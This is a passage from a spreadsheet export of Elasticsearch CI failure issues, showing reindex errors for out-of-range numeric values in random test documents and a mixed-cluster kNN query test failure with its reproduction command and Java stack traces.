{"took":1300,"timed_out":false,"total":27,"updated":0,"created":23,"deleted":0,"batches":1,"version_conflicts":0,"noops":0,"retries":{"bulk":0,"search":0},"throttled_millis":0,"requests_per_second":-1.0,"throttled_until_millis":0,"failures":[{"index":".ds-standard-apache-reindexed-contender-2025.01.03-000001","id":"23","cause":{"type":"document_parsing_exception","reason":"[1:29700] failed to parse field [VVzyvw.HfV.xYZclwpgUC] of type [long] in document with id '23'. Preview of field's value: '12821663210440491007'","caused_by":{"type":"x_content_parse_exception","reason":"[1:29720] Numeric value (12821663210440491007) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:23.000Z\",\"BxpVXQA\":3586641136058423380,\"DftSO\":74,\"JKWxswiQIJ\":[70,-98,null,62],\"JuQUnAN\":454425330720568216,\"Kc\":[],\"L\":[{\"JYYE\":11183,\"Ku\":0.65111995,\"NlmWLoi\":[12502934701016612863,6892975111926710272,8500476556437618688],\"PvWyfGr\":[0.28175021824912827,0.4066014085492271,0.8548395838603527,0.16293416561466545,0.9864652859604363],\"ST\":32228,\"YGAgdVN\":[1339288126,1501768735,762196704,1140947291,2042705959],\"bcwCPrzM\":[0.31937224,0.3020466],\"mwcMpdgn\":{\"BpAHOJbyx\"\"[truncated 37769 bytes]; line: 1, column: 29720]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (12821663210440491007) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:23.000Z\",\"BxpVXQA\":3586641136058423380,\"DftSO\":74,\"JKWxswiQIJ\":[70,-98,null,62],\"JuQUnAN\":454425330720568216,\"Kc\":[],\"L\":[{\"JYYE\":11183,\"Ku\":0.65111995,\"NlmWLoi\":[12502934701016612863,6892975111926710272,8500476556437618688],\"PvWyfGr\":[0.28175021824912827,0.4066014085492271,0.8548395838603527,0.16293416561466545,0.9864652859604363],\"ST\":32228,\"YGAgdVN\":[1339288126,1501768735,762196704,1140947291,2042705959],\"bcwCPrzM\":[0.31937224,0.3020466],\"mwcMpdgn\":{\"BpAHOJbyx\"\"[truncated 37769 bytes]; line: 1, column: 29720]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2025.01.03-000001","id":"20","cause":{"type":"document_parsing_exception","reason":"[1:65794] failed to parse field [VVzyvw.HfV.hqaTu] of type [long] in document with id '20'. Preview of field's value: '14011875098579959808'","caused_by":{"type":"x_content_parse_exception","reason":"[1:65814] Numeric value (14011875098579959808) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:20.000Z\",\"BxpVXQA\":-7730845717720100967,\"DftSO\":-11,\"JKWxswiQIJ\":-26,\"JuQUnAN\":3631619095745247837,\"Kc\":[{\"JgRDDl\":{\"Abk\":-429751369,\"BvpJds\":\"pUGIzDGDxfPZNRgnyxmSrIgXpcAs\",\"DWCy\":-24136,\"DiUBaSz\":{\"D\":[],\"Ep\":0.1051479,\"EyVLi\":0.6327165757235302,\"GwDSzpGDD\":[0.26872784],\"GzLyCNnWR\":\"tTCbLtFGjnHCgsPknmMdFsmqjOITXZRRDHzP\",\"OOmBgIuU\":18296396656158965759,\"ObXvcb\":[0.93563455],\"QmsYoE\":-4165502961047169415,\"QnAE\":[1423739397,-969894874,-531879829],\"QuviIYke\":7355,\"Y\"\"[truncated 68755 bytes]; line: 1, column: 65814]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (14011875098579959808) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:20.000Z\",\"BxpVXQA\":-7730845717720100967,\"DftSO\":-11,\"JKWxswiQIJ\":-26,\"JuQUnAN\":3631619095745247837,\"Kc\":[{\"JgRDDl\":{\"Abk\":-429751369,\"BvpJds\":\"pUGIzDGDxfPZNRgnyxmSrIgXpcAs\",\"DWCy\":-24136,\"DiUBaSz\":{\"D\":[],\"Ep\":0.1051479,\"EyVLi\":0.6327165757235302,\"GwDSzpGDD\":[0.26872784],\"GzLyCNnWR\":\"tTCbLtFGjnHCgsPknmMdFsmqjOITXZRRDHzP\",\"OOmBgIuU\":18296396656158965759,\"ObXvcb\":[0.93563455],\"QmsYoE\":-4165502961047169415,\"QnAE\":[1423739397,-969894874,-531879829],\"QuviIYke\":7355,\"Y\"\"[truncated 68755 bytes]; line: 1, column: 65814]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2025.01.03-000001","id":"16","cause":{"type":"document_parsing_exception","reason":"[1:241389] failed to parse field [VVzyvw.HfV.xYZclwpgUC] of type [long] in document with id '16'. Preview of field's value: '11040073195095851008'","caused_by":{"type":"x_content_parse_exception","reason":"[1:241409] Numeric value (11040073195095851008) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:16.000Z\",\"BxpVXQA\":[9004936916425239076,null,2259230814841788994,-1214557916645283832,-947847346891304633],\"DftSO\":null,\"JKWxswiQIJ\":[106,-82,-90,-109],\"JuQUnAN\":5566990868405153690,\"Kc\":[{\"JgRDDl\":{\"Abk\":[],\"BvpJds\":\"smKqIjmAQvYlqgYbLuS\",\"DWCy\":[-21334],\"DiUBaSz\":[],\"DjbrQf\":[0.1653180414281623,0.8256205456529088,0.4646715050176976,0.07894748991491174],\"EMa\":null,\"EmOiWX\":\"iKhqiTsIAUnSqlKAZpfGoAepqPcPa\",\"HVRqswrvH\":0.3965559,\"IBfUUgP\":-53,\"IJVjwBkK\":[0.93183184,0\"[truncated 244199 bytes]; line: 1, column: 241409]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (11040073195095851008) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:16.000Z\",\"BxpVXQA\":[9004936916425239076,null,2259230814841788994,-1214557916645283832,-947847346891304633],\"DftSO\":null,\"JKWxswiQIJ\":[106,-82,-90,-109],\"JuQUnAN\":5566990868405153690,\"Kc\":[{\"JgRDDl\":{\"Abk\":[],\"BvpJds\":\"smKqIjmAQvYlqgYbLuS\",\"DWCy\":[-21334],\"DiUBaSz\":[],\"DjbrQf\":[0.1653180414281623,0.8256205456529088,0.4646715050176976,0.07894748991491174],\"EMa\":null,\"EmOiWX\":\"iKhqiTsIAUnSqlKAZpfGoAepqPcPa\",\"HVRqswrvH\":0.3965559,\"IBfUUgP\":-53,\"IJVjwBkK\":[0.93183184,0\"[truncated 244199 bytes]; line: 1, column: 241409]","status":400,"failure_store":"not_enabled"},{"index":".ds-standard-apache-reindexed-contender-2025.01.03-000001","id":"24","cause":{"type":"document_parsing_exception","reason":"[1:123951] failed to parse field [VVzyvw.TJTqHgc.Vfrqp] of type [long] in document with id '24'. Preview of field's value: '15381195060062191616'","caused_by":{"type":"x_content_parse_exception","reason":"[1:123971] Numeric value (15381195060062191616) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:24.000Z\",\"BxpVXQA\":[2580113502619143289,4294384797572406780],\"DftSO\":54,\"JKWxswiQIJ\":[117,null],\"JuQUnAN\":[],\"Kc\":[{\"JgRDDl\":[{\"Abk\":-104292983,\"BvpJds\":\"VuVGCtaQndVfQYwfXNY\",\"DWCy\":-970,\"DiUBaSz\":[],\"DjbrQf\":0.9500208779580479,\"EMa\":-9159464750795631454,\"EmOiWX\":[\"twZYg\",\"vqcpdSfIwnAyNQWtkjVfmiXspKDxujKXXsvTMUCOUo\",\"hUMWCzBZvGCDFRAdcT\",\"LCfPxjbrnBVpUkhUjmeHnefxbxmgfLEUBKtZvyXK\",\"mvkrwrPcKwucIYIvjojHIiQgoiyyLRWWWYCWkRQFKuAIingF\"],\"HVRqswrvH\":[0.20340961,0.57892466\"[truncated 142586 bytes]; line: 1, column: 123971]","caused_by":{"type":"input_coercion_exception","reason":"Numeric value (15381195060062191616) out of range of long (-9223372036854775808 - 9223372036854775807)\n at [Source: (byte[])\"{\"@timestamp\":\"2024-01-01T10:00:24.000Z\",\"BxpVXQA\":[2580113502619143289,4294384797572406780],\"DftSO\":54,\"JKWxswiQIJ\":[117,null],\"JuQUnAN\":[],\"Kc\":[{\"JgRDDl\":[{\"Abk\":-104292983,\"BvpJds\":\"VuVGCtaQndVfQYwfXNY\",\"DWCy\":-970,\"DiUBaSz\":[],\"DjbrQf\":0.9500208779580479,\"EMa\":-9159464750795631454,\"EmOiWX\":[\"twZYg\",\"vqcpdSfIwnAyNQWtkjVfmiXspKDxujKXXsvTMUCOUo\",\"hUMWCzBZvGCDFRAdcT\",\"LCfPxjbrnBVpUkhUjmeHnefxbxmgfLEUBKtZvyXK\",\"mvkrwrPcKwucIYIvjojHIiQgoiyyLRWWWYCWkRQFKuAIingF\"],\"HVRqswrvH\":[0.20340961,0.57892466\"[truncated 142586 bytes]; line: 1, column: 123971]","status":400,"failure_store":"not_enabled"}]}  **Issue Reasons:** - [main] 3 failures in test testEsqlSource (0.4% fail rate in 743 executions) - [main] 2 failures in step part-2 (1.2% fail rate in 168 executions) - [main] 2 failures in pipeline elasticsearch-pull-request (1.2% fail rate in 168 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/119804</t>
  </si>
  <si>
    <t>[CI] MixedClusterClientYamlTestSuiteIT test {p0=search.vectors/110_knn_query_with_filter/PRE_FILTER: knn query with internal filter as pre-filter} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5760 / 8.12.2_bwc](https://gradle-enterprise.elastic.co/s/2oec47ob7mlke) - [elasticsearch-periodic #5755 / 8.14.3_bwc](https://gradle-enterprise.elastic.co/s/gzd3sank5jeby) - [elasticsearch-periodic #5755 / 8.13.4_bwc](https://gradle-enterprise.elastic.co/s/cznaukainsgmu) - [elasticsearch-pull-request #49316 / 8.14.3_bwc](https://gradle-enterprise.elastic.co/s/lmtsgcguohqag) - [elasticsearch-pull-request #49316 / 8.13.4_bwc](https://gradle-enterprise.elastic.co/s/2npbuwbxatkjy) - [elasticsearch-pull-request #49316 / 8.12.2_bwc](https://gradle-enterprise.elastic.co/s/o7inheghwqelc) - [elasticsearch-periodic #5750 / 8.12.2_bwc](https://gradle-enterprise.elastic.co/s/dm53o3v7j4w3a) **Reproduction Line:**  ./gradlew ":qa:mixed-cluster:v8.12.2#mixedClusterTest" -Dtests.class="org.elasticsearch.backwards.MixedClusterClientYamlTestSuiteIT" -Dtests.method="test {p0=search.vectors/110_knn_query_with_filter/POST_FILTER: knn query with filter from a parent bool query as post-filter}" -Dtests.seed=BC8F90630E5B76C9 -Dtests.bwc=true -Dtests.locale=jgo-Latn-CM -Dtests.timezone=Africa/Kampala -Druntime.java=23  **Applicable branches:** 8.x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backwards.MixedClusterClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Dsearch.vectors%2F110_knn_query_with_filter%2FPRE_FILTER%3A%20knn%20query%20with%20internal%20filter%20as%20pre-filter%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [search.vectors/110_knn_query_with_filter:238]: expected [2xx] status code but api [search] returned [400 Bad Request] [{"error":{"root_cause":[{"type":"x_content_parse_exception","reason":"[1:134] [knn] unknown field [k]","stack_trace":"org.elasticsearch.ElasticsearchException$1: [1:134] [knn] unknown field [k]\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:699)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:695)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.ElasticsearchException.generateFailureXContent(ElasticsearchException.java:627)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestResponse.build(RestResponse.java:180)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:140)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:111)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:443)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.tryAllHandlers(RestController.java:570)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:325)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.dispatchRequest(AbstractHttpServerTransport.java:458)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.handleIncomingRequest(AbstractHttpServerTransport.java:554)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.incomingRequest(AbstractHttpServerTransport.java:431)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.handlePipelinedRequest(Netty4HttpPipeliningHandler.java:128)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.channelRead(Netty4HttpPipeliningHandler.java:118)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.MessageToMessageCodec.channelRead(MessageToMessageCodec.java:111)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:346)\n\tat io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:318)\n\tat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io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1410)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:919)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:166)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:788)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeysPlain(NioEventLoop.java:689)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:652)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:562)\n\tat io.netty.common@4.1.94.Final/io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997)\n\tat io.netty.common@4.1.94.Final/io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)\n\tat java.base/java.lang.Thread.run(Thread.java:1583)\nCaused by: org.elasticsearch.xcontent.XContentParseException: [1:134] [knn] unknown field [k]\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$errorOnUnknown$2(ObjectParser.java:105)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:299)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.parse(ConstructingObjectParser.java:166)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.apply(ConstructingObjectParser.java:158)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.vectors.KnnVectorQueryBuilder.fromXContent(KnnVectorQueryBuilder.java:91)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.lambda$static$1(BoolQueryBuilder.java:266)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.parseArray(AbstractObjectParser.java:418)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.lambda$declareObjectArrayOrNull$13(AbstractObjectParser.java:304)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$declareField$10(ObjectParser.java:431)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseValue(ObjectParser.java:609)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseArray(ObjectParser.java:604)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseSub(ObjectParser.java:643)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:315)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:259)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.fromXContent(BoolQueryBuilder.java:294)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseTopLevelQuery(AbstractQueryBuilder.java:392)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1333)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1235)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.parseSearchRequest(RestSearchAction.java:180)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.lambda$prepareRequest$1(RestSearchAction.java:119)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestRequest.withContentOrSourceParamParserOrNull(RestRequest.java:550)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.prepareRequest(RestSearchAction.java:118)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.BaseRestHandler.handleRequest(BaseRestHandler.java:80)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.doHandleRequest(SecurityRestFilter.java:94)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.handleRequest(SecurityRestFilter.java:73)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:441)\n\t 44 more\n"}],"type":"x_content_parse_exception","reason":"[1:138] [bool] failed to parse field [must]","caused_by":{"type":"x_content_parse_exception","reason":"[1:134] [knn] unknown field [k]","stack_trace":"org.elasticsearch.xcontent.XContentParseException: [1:134] [knn] unknown field [k]\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$errorOnUnknown$2(ObjectParser.java:105)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:299)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.parse(ConstructingObjectParser.java:166)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ConstructingObjectParser.apply(ConstructingObjectParser.java:158)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.vectors.KnnVectorQueryBuilder.fromXContent(KnnVectorQueryBuilder.java:91)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.lambda$static$1(BoolQueryBuilder.java:266)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.parseArray(AbstractObjectParser.java:418)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.AbstractObjectParser.lambda$declareObjectArrayOrNull$13(AbstractObjectParser.java:304)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.lambda$declareField$10(ObjectParser.java:431)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseValue(ObjectParser.java:609)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseArray(ObjectParser.java:604)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseSub(ObjectParser.java:643)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:315)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:259)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.fromXContent(BoolQueryBuilder.java:294)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseInnerQueryBuilder(AbstractQueryBuilder.java:418)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder.parseTopLevelQuery(AbstractQueryBuilder.java:392)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1333)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.builder.SearchSourceBuilder.parseXContent(SearchSourceBuilder.java:1235)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.parseSearchRequest(RestSearchAction.java:180)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.lambda$prepareRequest$1(RestSearchAction.java:119)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestRequest.withContentOrSourceParamParserOrNull(RestRequest.java:550)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.action.search.RestSearchAction.prepareRequest(RestSearchAction.java:118)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.BaseRestHandler.handleRequest(BaseRestHandler.java:80)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.doHandleRequest(SecurityRestFilter.java:94)\n\tat org.elasticsearch.security@8.12.2/org.elasticsearch.xpack.security.rest.SecurityRestFilter.handleRequest(SecurityRestFilter.java:73)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:441)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.tryAllHandlers(RestController.java:570)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:325)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.dispatchRequest(AbstractHttpServerTransport.java:458)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.handleIncomingRequest(AbstractHttpServerTransport.java:554)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.http.AbstractHttpServerTransport.incomingRequest(AbstractHttpServerTransport.java:431)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.handlePipelinedRequest(Netty4HttpPipeliningHandler.java:128)\n\tat org.elasticsearch.transport.netty4@8.12.2/org.elasticsearch.http.netty4.Netty4HttpPipeliningHandler.channelRead(Netty4HttpPipeliningHandler.java:118)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.MessageToMessageCodec.channelRead(MessageToMessageCodec.java:111)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)\n\tat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io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:346)\n\tat io.netty.codec@4.1.94.Final/io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:318)\n\tat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io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1410)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:919)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:166)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:788)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeysPlain(NioEventLoop.java:689)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:652)\n\tat io.netty.transport@4.1.94.Final/io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:562)\n\tat io.netty.common@4.1.94.Final/io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997)\n\tat io.netty.common@4.1.94.Final/io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)\n\tat java.base/java.lang.Thread.run(Thread.java:1583)\n"},"stack_trace":"org.elasticsearch.xcontent.XContentParseException: [1:138] [bool] failed to parse field [must]\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.throwFailedToParse(ObjectParser.java:616)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseValue(ObjectParser.java:611)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseArray(ObjectParser.java:604)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parseSub(ObjectParser.java:643)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:315)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.ObjectParser.parse(ObjectParser.java:259)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.BoolQueryBuilder.fromXContent(BoolQueryBuilder.java:294)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.search.SearchModule.lambda$registerQuery$21(SearchModule.java:1203)\n\tat org.elasticsearch.xcontent@8.12.2/org.elasticsearch.xcontent.NamedXContentRegistry.parseNamedObject(NamedXContentRegistry.java:147)\n\tat org.elasticsearch.server@8.12.2/org.elasticsearch.index.query.AbstractQueryBuilder$1.namedObject(AbstractQueryBuilder.java:384)\n\tat 